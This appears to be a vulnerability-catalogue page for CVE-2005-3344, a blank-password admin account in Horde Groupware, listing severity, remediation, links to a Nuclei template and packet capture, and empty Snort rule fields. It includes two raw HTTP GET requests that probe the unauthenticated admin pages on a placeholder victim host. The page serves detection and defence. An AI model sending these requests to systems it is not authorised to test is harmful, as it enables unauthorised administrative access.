🔙 목록으로 돌아가기

CVE-2005-3344: Horde Groupware Unauthenticated Admin Access

TitleHorde Groupware Unauthenticated Admin Access
Authorpikpikcu
SeverityCritical
ImpactAn attacker can gain unauthorized access to sensitive administrative functions and potentially compromise the entire system.
RemediationApply the latest security patches or upgrade to a patched version of Horde Groupware to fix the vulnerability.
CVSS Score10
EPSS Score0.1015
CVE IDCVE-2005-3344
CWE IDNVD-CWE-Other
Tags cve2005 cve horde unauth vuln

🔍 Vulnerability Description

Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.

🌐 HTTP Request

GET /horde/admin/user.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Content-Type: text/html
Accept-Encoding: gzip
GET /admin/user.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/13.0
Connection: close
Accept: */*
Accept-Language: en
Content-Type: text/html
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2005/CVE-2005-3344.yaml

🦈 Packet Capture: ⬇️ Download cve-2005-3344.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A